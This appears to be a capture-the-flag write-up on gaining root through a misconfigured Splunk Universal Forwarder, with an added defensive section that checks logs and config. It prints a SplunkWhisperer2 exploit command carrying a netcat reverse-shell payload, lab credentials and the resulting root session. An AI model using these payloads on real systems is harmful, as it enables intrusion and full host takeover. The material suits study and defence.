Abusing Splunk Universal Forwarder (UF)


The Splunk Universal Forwarder agent (UF) allows authenticated remote users to send single commands or scripts to the agent through the Splunk API. The UF agent does not validate that incoming connections come from a valid Splunk Enterprise server, nor does it validate that the code is signed or otherwise proven to come from the Splunk Enterprise server. This allows an attacker who obtains the UF agent password to run arbitrary code on the host as SYSTEM or root, depending on the operating system.
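
From the defender's side, the weakness described above (the forwarder installs any app pushed by whoever holds the password) shows up in the forwarder's own REST access log, and is closed outright by disabling the management port. The following is an added example, not code from this page or from Splunk; it assumes an Apache-style `splunkd_access.log` line format, uses constructed sample lines, a made-up trusted-server list, and relies on `[httpServer] disableDefaultPort` in `server.conf` being the setting that turns off port 8089.

```python
import configparser
import re
from dataclasses import dataclass

# Assumed Apache-style format of splunkd_access.log on the forwarder.
LOG_RE = re.compile(
    r'^(?P<src>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample: a login followed by an app install from an unexpected host,
# then a legitimate install pushed by the deployment server.
SAMPLE_LOG = """\
10.10.14.9 - shaun [09/Mar/2023:19:36:33.101 +0000] "POST /services/auth/login HTTP/1.1" 200 - - - 3ms
10.10.14.9 - shaun [09/Mar/2023:19:36:34.512 +0000] "POST /services/apps/local HTTP/1.1" 201 - - - 41ms
10.10.10.5 - admin [09/Mar/2023:19:40:00.000 +0000] "GET /services/server/info HTTP/1.1" 200 - - - 2ms
10.10.10.5 - admin [09/Mar/2023:19:41:00.000 +0000] "POST /services/apps/local HTTP/1.1" 201 - - - 30ms
"""

# Assumption: only these hosts (deployment server / indexers) may push apps to forwarders.
TRUSTED_SERVERS = {"10.10.10.5"}


@dataclass(frozen=True)
class Finding:
    src: str
    user: str
    ts: str
    status: str


def find_untrusted_app_installs(log_text, trusted=TRUSTED_SERVERS):
    """Flag successful app installs (POST /services/apps/local) from hosts outside the trusted set."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].startswith("/services/apps/local"):
            continue
        # Ignore trusted sources and failed attempts (non-2xx); the latter belong in a brute-force rule.
        if m["src"] in trusted or not m["status"].startswith("2"):
            continue
        findings.append(Finding(m["src"], m["user"], m["ts"], m["status"]))
    return findings


def management_port_disabled(server_conf_text):
    """True when server.conf sets [httpServer] disableDefaultPort = true, i.e. port 8089 is closed."""
    cfg = configparser.ConfigParser()
    cfg.read_string(server_conf_text)
    return cfg.getboolean("httpServer", "disableDefaultPort", fallback=False)
```

On a forwarder that only receives apps from the deployment server, any hit from `find_untrusted_app_installs` is a high-confidence alert; on one that needs no remote management at all, `disableDefaultPort = true` removes the attack surface entirely.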

Exploit (SplunkWhisperer2)


This tool is the best tool for exploiting a misconfigured Splunk Universal Forwarder. It supports both Windows and Linux hosts; I will be using the Python implementation of the exploit.

Exploitation


┌──(kali㉿kali)-[~/…/labs/doctor/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host $IP --port 8089 --lhost 10.10.14.9 --username shaun --password Guitar123 --payload 'mkfifo /tmp/stsac; nc 10.10.14.9 1234 0</tmp/stsac | /bin/sh >/tmp/stsac 2>&1; rm /tmp/stsac'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] created malicious app bundle in: /tmp/tmpf0f_v6__.tar
[+] Started HTTP server for remote mode
[.] installing app from: http://10.10.14.9:8181/
10.10.10.209 - - [09/mar/2023 19:36:34] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
 
Press RETURN to cleanup

Launching the exploit with the payload above gives a callback on the listener:

┌──(kali㉿kali)-[~/archive/htb/labs/doctor]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.209] 45522
whoami
root
hostname
doctor
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:eb:28 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.209/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:eb28/64 scope global dynamic mngtmpaddr 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:eb28/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise